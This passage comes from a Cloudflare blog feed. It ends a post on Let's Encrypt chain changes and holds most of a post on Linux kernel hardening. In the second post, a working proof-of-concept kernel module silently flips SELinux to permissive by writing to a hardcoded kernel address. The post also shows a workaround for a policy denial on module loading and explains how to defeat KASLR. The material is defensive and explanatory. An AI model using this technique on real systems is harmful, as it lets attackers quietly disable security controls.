outage by ensuring that there’s always a TLS certificate available for the domain, even if it does not come from a preferred CA.</p><p>Today, Cloudflare is not a publicly trusted certificate authority, so we rely on the CAs that we use to be highly available. But, 100% uptime is an unrealistic expectation. Instead, our pipeline needs to be prepared in case our CAs become unavailable.</p>
    <div>
      <h4>Ensuring that CA-related issues have zero impact on our customer’s ability to obtain a certificate</h4>
      <a href="#ensuring-that-ca-related-issues-have-zero-impact-on-our-customers-ability-to-obtain-a-certificate">
        
      </a>
    </div>
    <p>At Cloudflare, we like to think ahead, which means preventing incidents before they happen. It’s not uncommon for CAs to become unavailable — sometimes this happens because of an outage, but more commonly, CAs have maintenance periods every so often where they become unavailable for some period of time.</p><p>It’s our job to ensure CA redundancy, which is why we always have multiple CAs ready to issue a certificate, ensuring high availability at all times. If you've noticed different CAs issuing your Universal SSL certificates, that's intentional. We evenly distribute the load across our CAs to avoid any single point of failure. Plus, we keep a close eye on latency and error rates to detect any issues and automatically switch to a different CA that's available and performant. You may not know this, but one of our CAs has around 4 scheduled maintenance periods every month. When this happens, our automated systems kick in seamlessly, keeping everything running smoothly. This works so well that our internal teams don’t get paged anymore because everything <i>just works.</i></p>
    <div>
      <h4>Adopting best security practices and modern standards  </h4>
      <a href="#adopting-best-security-practices-and-modern-standards">
        
      </a>
    </div>
    <p>Security has always been, and will continue to be, Cloudflare’s top priority, and so maintaining the highest security standards to safeguard our customer’s data and private keys is crucial.</p><p>Over the past decade, the <a href="https://cabforum.org/">CA/Browser Forum</a> has advocated for reducing certificate lifetimes from 5 years to 90 days as the industry norm. This shift helps minimize the risk of a key compromise. When certificates are renewed every 90 days, their private keys remain valid for only that period, reducing the window of time that a bad actor can make use of the compromised material.</p><p>We fully embrace this change and have made 90 days the default certificate validity period. This enhances our security posture by ensuring regular key rotations, and has pushed us to develop tools like DCV Delegation that promote <a href="https://www.cloudflare.com/application-services/solutions/certificate-lifecycle-management/">automation</a> around frequent certificate renewals, without the added overhead. It’s what enables us to offer certificates with validity periods as low as two weeks, for customers that want to rotate their private keys at a high frequency without any concern that it will lead to certificate renewal failures.</p><p>Cloudflare has always been at the forefront of new protocols and standards. <a href="https://www.cloudflare.com/press-releases/2014/cloudflare-offers-the-industrys-first-universal-ssl-for-free/">It’s no secret</a> that when we support a new protocol, adoption skyrockets. This month, we will be adding <a href="/ecdsa-the-digital-signature-algorithm-of-a-better-internet">ECDSA</a> support for certificates issued from <a href="https://pki.goog/">Google Trust Services</a>. With <a href="https://www.cloudflare.com/learning/dns/dnssec/ecdsa-and-dnssec/">ECDSA</a>, you get the same level of security as RSA but with smaller keys. Smaller keys mean smaller certificates and less data passed around to establish a TLS connection, which results in quicker connections and faster loading times.</p>
    <div>
      <h4>Optimizing for future scale</h4>
      <a href="#optimizing-for-future-scale">
        
      </a>
    </div>
    <p>Today, Cloudflare issues almost 1 million certificates per day. With the recent shift towards shorter certificate lifetimes, we continue to improve our pipeline to be more robust. But even if our pipeline can handle the significant load, we still need to rely on our CAs to be able to scale with us. With every CA that we integrate, we instantly become one of their biggest consumers. We hold our CAs to high standards and push them to improve their infrastructure to scale. This doesn’t just benefit Cloudflare’s customers, but it helps the Internet by requiring CAs to handle higher volumes of issuance.</p><p>And now, with Let’s Encrypt shortening their chain of trust, we’re going to add an additional improvement to our pipeline — one that will ensure the best device compatibility for all.</p>
    <div>
      <h4>Supporting all clients — legacy and modern</h4>
      <a href="#supporting-all-clients-legacy-and-modern">
        
      </a>
    </div>
    <p>The upcoming Let’s Encrypt change will prevent legacy devices from making requests to domains or applications that are protected by a Let’s Encrypt certificate. We don’t want to cut off Internet access from any part of the world, which means that we’re going to continue to provide the best device compatibility to our customers, despite the change.</p><p>Because of all the recent enhancements, we are able to reduce our reliance on Let’s Encrypt without impacting the reliability or quality of service of our certificate pipeline. One certificate lifecycle (90 days) before the change, we are going to start shifting certificates to use a different CA, one that’s compatible with the devices that will be impacted. By doing this, we’ll mitigate any impact without any action required from our customers. The only customers that will continue to use Let’s Encrypt are ones that have specifically chosen Let’s Encrypt as the CA.</p>
    <div>
      <h3>What to expect of the upcoming Let’s Encrypt change</h3>
      <a href="#what-to-expect-of-the-upcoming-lets-encrypt-change">
        
      </a>
    </div>
    <p>Let’s Encrypt’s cross-signed chain will <a href="https://letsencrypt.org/2023/07/10/cross-sign-expiration.html">expire</a> on September 30th, 2024. Although Let’s Encrypt plans to stop issuing certificates from this chain on June 6th, 2024, Cloudflare will continue to serve the cross-signed chain for all Let’s Encrypt certificates until September 9th, 2024.</p><p>90 days or one certificate lifecycle before the change, we are going to start shifting Let’s Encrypt certificates to use a different certificate authority. We’ll make this change for all products where Cloudflare is responsible for the CA selection, meaning this will be automatically done for customers using Universal SSL and SSL for SaaS with the “default CA” choice.</p><p>Any customers that have specifically chosen Let’s Encrypt as their CA will receive an email notification with a list of their Let’s Encrypt certificates and information on whether or not we’re seeing requests on those hostnames coming from legacy devices.</p><p>After September 9th, 2024, Cloudflare will serve all Let’s Encrypt certificates using the ISRG Root X1 chain. Here is what you should expect based on the certificate product that you’re using:</p>
    <div>
      <h4>Universal SSL</h4>
      <a href="#universal-ssl">
        
      </a>
    </div>
    <p>With <a href="https://developers.cloudflare.com/ssl/edge-certificates/universal-ssl/">Universal SSL</a>, Cloudflare chooses the CA that is used for the domain’s certificate. This gives us the power to choose the best certificate for our customers. <b>If you are using Universal SSL, there are no changes for you to make to prepare for this change</b>. Cloudflare will automatically shift your certificate to use a more compatible CA.</p>
    <div>
      <h4>Advanced Certificates</h4>
      <a href="#advanced-certificates">
        
      </a>
    </div>
    <p>With <a href="https://developers.cloudflare.com/ssl/edge-certificates/advanced-certificate-manager/">Advanced Certificate Manager</a>, customers specifically choose which CA they want to use. If Let’s Encrypt was specifically chosen as the CA for a certificate, we will respect the choice, because customers may have specifically chosen this CA due to internal requirements, or because they have implemented certificate pinning, which we highly discourage.</p><p>If we see that a domain using an Advanced certificate issued from Let’s Encrypt will be impacted by the change, then we will send out email notifications to inform those customers which certificates are using Let’s Encrypt as their CA and whether or not those domains are receiving requests from clients that will be impacted by the change. Customers will be responsible for changing the CA to another provider, if they chose to do so.</p>
    <div>
      <h4>SSL for SaaS</h4>
      <a href="#ssl-for-saas">
        
      </a>
    </div>
    <p>With <a href="https://developers.cloudflare.com/cloudflare-for-platforms/cloudflare-for-saas/security/certificate-management/">SSL for SaaS</a>, customers have two options: using a default CA, meaning Cloudflare will choose the issuing authority, or specifying which CA to use.</p><p>If you’re leaving the CA choice up to Cloudflare, then we will automatically use a CA with higher device compatibility.</p><p>If you’re specifying a certain CA for your custom hostnames, then we will respect that choice. We will send an email out to SaaS providers and platforms to inform them which custom hostnames are receiving requests from legacy devices. Customers will be responsible for changing the CA to another provider, if they chose to do so.</p>
    <div>
      <h4>Custom Certificates</h4>
      <a href="#custom-certificates">
        
      </a>
    </div>
    <p>If you directly integrate with Let’s Encrypt and use <a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/">Custom Certificates</a> to upload your Let’s Encrypt certs to Cloudflare then your certificates will be bundled with the cross-signed chain, as long as you choose the bundle method “<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#compatible">compatible</a>” or “<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#modern">modern</a>” and upload those certificates before September 9th, 2024. After September 9th, we will bundle all Let’s Encrypt certificates with the ISRG Root X1 chain. With the “<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#user-defined">user-defined</a>” bundle method, we always serve the chain that’s uploaded to Cloudflare. If you upload Let’s Encrypt certificates using this method, you will need to ensure that certificates uploaded after September 30th, 2024, the date of the CA expiration, contain the right certificate chain.</p><p>In addition, if you control the clients that are connecting to your application, we recommend updating the trust store to include the <a href="https://letsencrypt.org/certificates/#root-certificates">ISRG Root X1</a>. If you use certificate pinning, remove or update your pin. In general, we discourage all customers from pinning their certificates, as this usually leads to issues during certificate renewals or CA changes.</p>
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Internet standards will continue to evolve and improve. As we support and embrace those changes, we also need to recognize that it’s our responsibility to keep users online and to maintain Internet access in the parts of the world where new technology is not readily available. By using Cloudflare, you always have the option to choose the setup that’s best for your application.</p><p>For additional information regarding the change, please refer to our <a href="https://developers.cloudflare.com/ssl/reference/migration-guides/lets-encrypt-chain/">developer documentation</a>.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[TLS]]></category>
            <category><![CDATA[SSL]]></category>
            <category><![CDATA[Certificate Authority]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">ymep6DaFvevM4m2AIdw5F</guid>
            <dc:creator>Dina Kozlov</dc:creator>
        </item>
        <item>
            <title><![CDATA[Linux kernel security tunables everyone should consider adopting]]></title>
            <link>https://blog.cloudflare.com/linux-kernel-hardening/</link>
            <pubDate>Wed, 06 Mar 2024 14:00:43 GMT</pubDate>
            <description><![CDATA[ This post illustrates some of the Linux Kernel features, which are helping us to keep our production systems more secure. We will deep dive into how they work and why you may consider enabling them as well ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1MwDdpmFexb2YBRb6Y4VkD/f8fe7a101729ee9fa518a457b8bb170a/Technical-deep-dive-for-Security-week.png" />
            
            </figure><p>The Linux kernel is the heart of many modern production systems. It decides when any code is allowed to run and which programs/users can access which resources. It manages memory, mediates access to hardware, and does a bulk of work under the hood on behalf of programs running on top. Since the kernel is always involved in any code execution, it is in the best position to protect the system from malicious programs, enforce the desired system security policy, and provide security features for safer production environments.</p><p>In this post, we will review some Linux kernel security configurations we use at Cloudflare and how they help to block or minimize a potential system compromise.</p>
    <div>
      <h2>Secure boot</h2>
      <a href="#secure-boot">
        
      </a>
    </div>
    <p>When a machine (either a laptop or a server) boots, it goes through several boot stages:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7LULhRh5qh02zFnil5ZPnl/b2e1867ba56492628bbb95ba6850448e/image3-17.png" />
            
            </figure><p>Within a secure boot architecture each stage from the above diagram verifies the integrity of the next stage before passing execution to it, thus forming a so-called secure boot chain. This way “trustworthiness” is extended to every component in the boot chain, because if we verified the code integrity of a particular stage, we can trust this code to verify the integrity of the next stage.</p><p>We <a href="/anchoring-trust-a-hardware-secure-boot-story">have previously covered</a> how Cloudflare implements secure boot in the initial stages of the boot process. In this post, we will focus on the Linux kernel.</p><p>Secure boot is the cornerstone of any operating system security mechanism. The Linux kernel is the primary enforcer of the operating system security configuration and policy, so we have to be sure that the Linux kernel itself has not been tampered with. In our previous <a href="/anchoring-trust-a-hardware-secure-boot-story">post about secure boot</a> we showed how we use UEFI Secure Boot to ensure the integrity of the Linux kernel.</p><p>But what happens next? After the kernel gets executed, it may try to load additional drivers, or as they are called in the Linux world, kernel modules. And kernel module loading is not confined just to the boot process. A module can be loaded at any time during runtime — a new device being plugged in and a driver is needed, some additional extensions in the networking stack are required (for example, for fine-grained firewall rules), or just manually by the system administrator.</p><p>However, uncontrolled kernel module loading might pose a significant risk to system integrity. Unlike regular programs, which get executed as user space processes, kernel modules are pieces of code which get injected and executed directly in the Linux kernel address space. There is no separation between the code and data in different kernel modules and core kernel subsystems, so everything can access everything. This means that a rogue kernel module can completely nullify the trustworthiness of the operating system and make secure boot useless. As an example, consider a simple Debian 12 (Bookworm installation), but with <a href="https://selinuxproject.org/">SELinux</a> configured and enforced:</p>
            <pre><code>ignat@dev:~$ lsb_release --all
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 12 (bookworm)
Release:	12
Codename:	bookworm
ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ sudo getenforce
Enforcing</code></pre>
            <p>Now we need to do some research. First, we see that we’re running 6.1.76 Linux Kernel. If we explore the source code, we would see that <a href="https://elixir.bootlin.com/linux/v6.1.76/source/security/selinux/hooks.c#L107">inside the kernel, the SELinux configuration is stored in a singleton structure</a>, which <a href="https://elixir.bootlin.com/linux/v6.1.76/source/security/selinux/include/security.h#L92">is defined</a> as follows:</p>
            <pre><code>struct selinux_state {
#ifdef CONFIG_SECURITY_SELINUX_DISABLE
	bool disabled;
#endif
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
	bool enforcing;
#endif
	bool checkreqprot;
	bool initialized;
	bool policycap[__POLICYDB_CAP_MAX];

	struct page *status_page;
	struct mutex status_lock;

	struct selinux_avc *avc;
	struct selinux_policy __rcu *policy;
	struct mutex policy_mutex;
} __randomize_layout;</code></pre>
            <p>From the above, we can see that if the kernel configuration has <code>CONFIG_SECURITY_SELINUX_DEVELOP</code> enabled, the structure would have a boolean variable <code>enforcing</code>, which controls the enforcement status of SELinux at runtime. This is exactly what the above <code>$ sudo getenforce</code> command returns. We can double check that the Debian kernel indeed has the configuration option enabled:</p>
            <pre><code>ignat@dev:~$ grep CONFIG_SECURITY_SELINUX_DEVELOP /boot/config-`uname -r`
CONFIG_SECURITY_SELINUX_DEVELOP=y</code></pre>
            <p>Good! Now that we have a variable in the kernel, which is responsible for some security enforcement, we can try to attack it. One problem though is the <code>__randomize_layout</code> attribute: since <code>CONFIG_SECURITY_SELINUX_DISABLE</code> is actually not set for our Debian kernel, normally <code>enforcing</code> would be the first member of the struct. Thus if we know where the struct is, we immediately know the position of the <code>enforcing</code> flag. With <code>__randomize_layout</code>, during kernel compilation the compiler might place members at arbitrary positions within the struct, so it is harder to create generic exploits. But arbitrary struct randomization within the kernel <a href="https://elixir.bootlin.com/linux/v6.1.76/source/security/Kconfig.hardening#L301">may introduce performance impact</a>, so is often disabled and it is disabled for the Debian kernel:</p>
            <pre><code>ignat@dev:~$ grep RANDSTRUCT /boot/config-`uname -r`
CONFIG_RANDSTRUCT_NONE=y</code></pre>
            <p>We can also confirm the compiled position of the <code>enforcing</code> flag using the <a href="https://git.kernel.org/pub/scm/devel/pahole/pahole.git/">pahole tool</a> and either kernel debug symbols, if available, or (on modern kernels, if enabled) in-kernel <a href="https://www.kernel.org/doc/html/next/bpf/btf.html">BTF</a> information. We will use the latter:</p>
            <pre><code>ignat@dev:~$ pahole -C selinux_state /sys/kernel/btf/vmlinux
struct selinux_state {
	bool                       enforcing;            /*     0     1 */
	bool                       checkreqprot;         /*     1     1 */
	bool                       initialized;          /*     2     1 */
	bool                       policycap[8];         /*     3     8 */

	/* XXX 5 bytes hole, try to pack */

	struct page *              status_page;          /*    16     8 */
	struct mutex               status_lock;          /*    24    32 */
	struct selinux_avc *       avc;                  /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	struct selinux_policy *    policy;               /*    64     8 */
	struct mutex               policy_mutex;         /*    72    32 */

	/* size: 104, cachelines: 2, members: 9 */
	/* sum members: 99, holes: 1, sum holes: 5 */
	/* last cacheline: 40 bytes */
};</code></pre>
            <p>So <code>enforcing</code> is indeed located at the start of the structure and we don’t even have to be a privileged user to confirm this.</p><p>Great! All we need is the runtime address of the <code>selinux_state</code> variable inside the kernel:(shell/bash)</p>
            <pre><code>ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffbc3bcae0 B selinux_state</code></pre>
            <p>With all the information, we can write an almost textbook simple kernel module to manipulate the SELinux state:</p><p>Mymod.c:</p>
            <pre><code>#include &lt;linux/module.h&gt;

static int __init mod_init(void)
{
	bool *selinux_enforce = (bool *)0xffffffffbc3bcae0;
	*selinux_enforce = false;
	return 0;
}

static void mod_fini(void)
{
}

module_init(mod_init);
module_exit(mod_fini);

MODULE_DESCRIPTION("A somewhat malicious module");
MODULE_AUTHOR("Ignat Korchagin &lt;ignat@cloudflare.com&gt;");
MODULE_LICENSE("GPL");</code></pre>
            <p>And the respective <code>Kbuild</code> file:</p>
            <pre><code>obj-m := mymod.o</code></pre>
            <p>With these two files we can build a full fledged kernel module according to <a href="https://docs.kernel.org/kbuild/modules.html">the official kernel docs</a>:</p>
            <pre><code>ignat@dev:~$ cd mymod/
ignat@dev:~/mymod$ ls
Kbuild  mymod.c
ignat@dev:~/mymod$ make -C /lib/modules/`uname -r`/build M=$PWD
make: Entering directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'
  CC [M]  /home/ignat/mymod/mymod.o
  MODPOST /home/ignat/mymod/Module.symvers
  CC [M]  /home/ignat/mymod/mymod.mod.o
  LD [M]  /home/ignat/mymod/mymod.ko
  BTF [M] /home/ignat/mymod/mymod.ko
Skipping BTF generation for /home/ignat/mymod/mymod.ko due to unavailability of vmlinux
make: Leaving directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'</code></pre>
            <p>If we try to load this module now, the system may not allow it due to the SELinux policy:</p>
            <pre><code>ignat@dev:~/mymod$ sudo insmod mymod.ko
insmod: ERROR: could not load module mymod.ko: Permission denied</code></pre>
            <p>We can workaround it by copying the module into the standard module path somewhere:</p>
            <pre><code>ignat@dev:~/mymod$ sudo cp mymod.ko /lib/modules/`uname -r`/kernel/crypto/</code></pre>
            <p>Now let’s try it out:</p>
            <pre><code>ignat@dev:~/mymod$ sudo getenforce
Enforcing
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
ignat@dev:~/mymod$ sudo getenforce
Permissive</code></pre>
            <p>Not only did we disable the SELinux protection via a malicious kernel module, we did it quietly. Normal <code>sudo setenforce 0</code>, even if allowed, would go through the official <a href="https://elixir.bootlin.com/linux/v6.1.76/source/security/selinux/selinuxfs.c#L173">selinuxfs interface and would emit an audit message</a>. Our code manipulated the kernel memory directly, so no one was alerted. This illustrates why uncontrolled kernel module loading is very dangerous and that is why most security standards and commercial security monitoring products advocate for close monitoring of kernel module loading.</p><p>But we don’t need to monitor kernel modules at Cloudflare. Let’s repeat the exercise on a Cloudflare production kernel (module recompilation skipped for brevity):</p>
            <pre><code>ignat@dev:~/mymod$ uname -a
Linux dev 6.6.17-cloudflare-2024.2.9 #1 SMP PREEMPT_DYNAMIC Mon Sep 27 00:00:00 UTC 2010 x86_64 GNU/Linux
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
insmod: ERROR: could not insert module /lib/modules/6.6.17-cloudflare-2024.2.9/kernel/crypto/mymod.ko: Key was rejected by service</code></pre>
            <p>We get a <code>Key was rejected by service</code> error when trying to load a module, and the kernel log will have the following message:</p>
            <pre><code>ignat@dev:~/mymod$ sudo dmesg | tail -n 1
[41515.037031] Loading of unsigned module is rejected</code></pre>
            <p>This is because the Cloudflare kernel <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/module/Kconfig#L211">requires all the kernel modules to have a valid signature</a>, so we don’t even have to worry about a malicious module being loaded at some point:</p>
            <pre><code>ignat@dev:~$ grep MODULE_SIG_FORCE /boot/config-`uname -r`
CONFIG_MODULE_SIG_FORCE=y</code></pre>
            <p>For completeness it is worth noting that the Debian stock kernel also supports module signatures, but does not enforce it:</p>
            <pre><code>ignat@dev:~$ grep MODULE_SIG /boot/config-6.1.0-18-cloud-amd64
CONFIG_MODULE_SIG_FORMAT=y
CONFIG_MODULE_SIG=y
# CONFIG_MODULE_SIG_FORCE is not set
…</code></pre>
            <p>The above configuration means that the kernel will validate a module signature, if available. But if not - the module will be loaded anyway with a warning message emitted and the <a href="https://docs.kernel.org/admin-guide/tainted-kernels.html">kernel will be tainted</a>.</p>
    <div>
      <h3>Key management for kernel module signing</h3>
      <a href="#key-management-for-kernel-module-signing">
        
      </a>
    </div>
    <p>Signed kernel modules are great, but it creates a key management problem: to sign a module we need a signing keypair that is trusted by the kernel. The public key of the keypair is usually directly embedded into the kernel binary, so the kernel can easily use it to verify module signatures. The private key of the pair needs to be protected and secure, because if it is leaked, anyone could compile and sign a potentially malicious kernel module which would be accepted by our kernel.</p><p>But what is the best way to eliminate the risk of losing something? Not to have it in the first place! Luckily the kernel build system <a href="https://elixir.bootlin.com/linux/v6.6.17/source/certs/Makefile#L36">will generate a random keypair</a> for module signing, if none is provided. At Cloudflare, we use that feature to sign all the kernel modules during the kernel compilation stage. When the compilation and signing is done though, instead of storing the key in a secure place, we just destroy the private key:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1EWN5Kh5NebZTW3kAzK9uM/0dfb98bc095710e5b317a128d3efb1c0/image1-19.png" />
            
            </figure><p>So with the above process:</p><ol><li><p>The kernel build system generated a random keypair, compiles the kernel and modules</p></li><li><p>The public key is embedded into the kernel image, the private key is used to sign all the modules</p></li><li><p>The private key is destroyed</p></li></ol><p>With this scheme not only do we not have to worry about module signing key management, we also use a different key for each kernel we release to production. So even if a particular build process is hijacked and the signing key is not destroyed and potentially leaked, the key will no longer be valid when a kernel update is released.</p><p>There are some flexibility downsides though, as we can’t “retrofit” a new kernel module for an already released kernel (for example, for <a href="https://www.cloudflare.com/en-gb/press-releases/2023/cloudflare-powers-hyper-local-ai-inference-with-nvidia/">a new piece of hardware we are adopting</a>). However, it is not a practical limitation for us as we release kernels often (roughly every week) to keep up with a steady stream of bug fixes and vulnerability patches in the Linux Kernel.</p>
    <div>
      <h2>KEXEC</h2>
      <a href="#kexec">
        
      </a>
    </div>
    <p><a href="https://en.wikipedia.org/wiki/Kexec">KEXEC</a> (or <code>kexec_load()</code>) is an interesting system call in Linux, which allows for one kernel to directly execute (or jump to) another kernel. The idea behind this is to switch/update/downgrade kernels faster without going through a full reboot cycle to minimize the potential system downtime. However, it was developed quite a while ago, when secure boot and system integrity was not quite a concern. Therefore its original design has security flaws and is known to be able to <a href="https://mjg59.dreamwidth.org/28746.html">bypass secure boot and potentially compromise system integrity</a>.</p><p>We can see the problems just based on the <a href="https://man7.org/linux/man-pages/man2/kexec_load.2.html">definition of the system call itself</a>:</p>
            <pre><code>struct kexec_segment {
	const void *buf;
	size_t bufsz;
	const void *mem;
	size_t memsz;
};
...
long kexec_load(unsigned long entry, unsigned long nr_segments, struct kexec_segment *segments, unsigned long flags);</code></pre>
            <p>So the kernel expects just a collection of buffers with code to execute. Back in those days there was not much desire to do a lot of data parsing inside the kernel, so the idea was to parse the to-be-executed kernel image in user space and provide the kernel with only the data it needs. Also, to switch kernels live, we need an intermediate program which would take over while the old kernel is shutting down and the new kernel has not yet been executed. In the kexec world this program is called <a href="https://git.kernel.org/pub/scm/utils/kernel/kexec/kexec-tools.git/tree/purgatory">purgatory</a>. Thus the problem is evident: we give the kernel a bunch of code and it will happily execute it at the highest privilege level. But instead of the original kernel or purgatory code, we can easily provide code similar to the one demonstrated earlier in this post, which disables SELinux (or does something else to the kernel).</p><p>At Cloudflare we have had <code>kexec_load()</code> disabled for some time now just because of this. The advantage of faster reboots with kexec comes with <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/Kconfig.kexec#L30">a (small) risk of improperly initialized hardware</a>, so it was not worth using it even without the security concerns. However, kexec does provide one useful feature — it is the foundation of the Linux kernel <a href="https://docs.kernel.org/admin-guide/kdump/kdump.html">crashdumping solution</a>. In a nutshell, if a kernel crashes in production (due to a bug or some other error), a backup kernel (previously loaded with kexec) can take over, collect and save the memory dump for further investigation. This allows to more effectively investigate kernel and other issues in production, so it is a powerful tool to have.</p><p>Luckily, since the <a href="https://mjg59.dreamwidth.org/28746.html">original problems with kexec were outlined</a>, Linux developed an alternative <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/Kconfig.kexec#L36">secure interface for kexec</a>: instead of buffers with code it expects file descriptors with the to-be-executed kernel image and initrd and does parsing inside the kernel. Thus, only a valid kernel image can be supplied. On top of this, we can <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/Kconfig.kexec#L48">configure</a> and <a href="https://elixir.bootlin.com/linux/v6.6.17/source/kernel/Kconfig.kexec#L62">require</a> kexec to ensure the provided images are properly signed, so only authorized code can be executed in the kexec scenario. A secure configuration for kexec looks something like this:</p>
            <pre><code>ignat@dev:~$ grep KEXEC /boot/config-`uname -r`
CONFIG_KEXEC_CORE=y
CONFIG_HAVE_IMA_KEXEC=y
# CONFIG_KEXEC is not set
CONFIG_KEXEC_FILE=y
CONFIG_KEXEC_SIG=y
CONFIG_KEXEC_SIG_FORCE=y
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…</code></pre>
            <p>Above we ensure that the legacy <code>kexec_load()</code> system call is disabled by disabling <code>CONFIG_KEXEC</code>, but still can configure Linux Kernel crashdumping via the new <code>kexec_file_load()</code> system call via <code>CONFIG_KEXEC_FILE=y</code> with enforced signature checks (<code>CONFIG_KEXEC_SIG=y</code> and <code>CONFIG_KEXEC_SIG_FORCE=y</code>).</p><p>Note that stock Debian kernel has the legacy <code>kexec_load()</code> system call enabled and does not enforce signature checks for <code>kexec_file_load()</code> (similar to module signature checks):</p>
            <pre><code>ignat@dev:~$ grep KEXEC /boot/config-6.1.0-18-cloud-amd64
CONFIG_KEXEC=y
CONFIG_KEXEC_FILE=y
CONFIG_ARCH_HAS_KEXEC_PURGATORY=y
CONFIG_KEXEC_SIG=y
# CONFIG_KEXEC_SIG_FORCE is not set
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…</code></pre>
            
    <div>
      <h2>Kernel Address Space Layout Randomization (KASLR)</h2>
      <a href="#kernel-address-space-layout-randomization-kaslr">
        
      </a>
    </div>
    <p>Even on the stock Debian kernel if you try to repeat the exercise we described in the “Secure boot” section of this post after a system reboot, you will likely see it would fail to disable SELinux now. This is because we hardcoded the kernel address of the <code>selinux_state</code> structure in our malicious kernel module, but the address changed now:</p>
            <pre><code>ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state</code></pre>
            <p><a href="https://docs.kernel.org/security/self-protection.html#kernel-address-space-layout-randomization-kaslr">Kernel Address Space Layout Randomization (or KASLR)</a> is a simple concept: it slightly and randomly shifts the kernel code and data on each boot:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6e7sTU0q25lHmBG5b4Q8if/d19a762047547d6f14dff4f9ab8f2d81/Screenshot-2024-03-06-at-13.53.23-2.png" />
            
            </figure><p>This is to combat targeted exploitation (like the malicious module in this post) based on the knowledge of the location of internal kernel structures and code. It is especially useful for popular Linux distribution kernels, like the Debian one, because most users use the same binary and anyone can download the debug symbols and the System.map file with all the addresses of the kernel internals. Just to note: it will not prevent the module loading and doing harm, but it will likely not achieve the targeted effect of disabling SELinux. Instead, it will modify a random piece of kernel memory potentially causing the kernel to crash.</p><p>Both the Cloudflare kernel and the Debian one have this feature enabled:</p>
            <pre><code>ignat@dev:~$ grep RANDOMIZE_BASE /boot/config-`uname -r`
CONFIG_RANDOMIZE_BASE=y</code></pre>
            
    <div>
      <h3>Restricted kernel pointers</h3>
      <a href="#restricted-kernel-pointers">
        
      </a>
    </div>
    <p>While KASLR helps with targeted exploits, it is quite easy to bypass since everything is shifted by a single random offset as shown on the diagram above. Thus if the attacker knows at least one runtime kernel address, they can recover this offset by subtracting the runtime address from the compile time address of the same symbol (function or data structure) from the kernel’s System.map file. Once they know the offset, they can recover the addresses of all other symbols by adjusting them by this offset.</p><p>Therefore, modern kernels take precautions not to leak kernel addresses at least to unprivileged users. One of the main tunables for this is the <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#kptr-restrict">kptr_restrict sysctl</a>. It is a good idea to set it at least to <code>1</code> to not allow regular users to see kernel pointers:(shell/bash)</p>
            <pre><code>ignat@dev:~$ sudo sysctl -w kernel.kptr_restrict=1
kernel.kptr_restrict = 1
ignat@dev:~$ grep selinux_state /proc/kallsyms
0000000000000000 B selinux_state</code></pre>
            <p>Privileged users can still see the pointers:</p>
            <pre><code>ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state</code></pre>
            <p>Similar to <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#kptr-restrict">kptr_restrict sysctl</a> there is also <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#dmesg-restrict">dmesg_restrict</a>, which if set, would prevent regular users from reading the kernel log (which may also leak kernel pointers via its messages). While you need to explicitly set <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#kptr-restrict">kptr_restrict sysctl</a> to a non-zero value on each boot (or use some system sysctl configuration utility, like <a href="https://www.freedesktop.org/software/systemd/man/latest/systemd-sysctl.service.html">this one</a>), you can configure <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#dmesg-restrict">dmesg_restrict</a> initial value via the <code>CONFIG_SECURITY_DMESG_RESTRICT</code> kernel configuration option. Both the Cloudflare kernel and the Debian one enforce <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#dmesg-restrict">dmesg_restrict</a> this way:</p>
            <pre><code>ignat@dev:~$ grep CONFIG_SECURITY_DMESG_RESTRICT /boot/config-`uname -r`
CONFIG_SECURITY_DMESG_RESTRICT=y</code></pre>
            <p>Worth noting that <code>/proc/kallsyms</code> and the kernel log are not the only sources of potential kernel pointer leaks. There is a lot of legacy in the Linux kernel and [new sources are continuously being found and patched]. That’s why it is very important to stay up to date with the latest kernel bugfix releases.</p>
    <div>
      <h2>Lockdown LSM</h2>
      <a href="#lockdown-lsm">
        
      </a>
    </div>
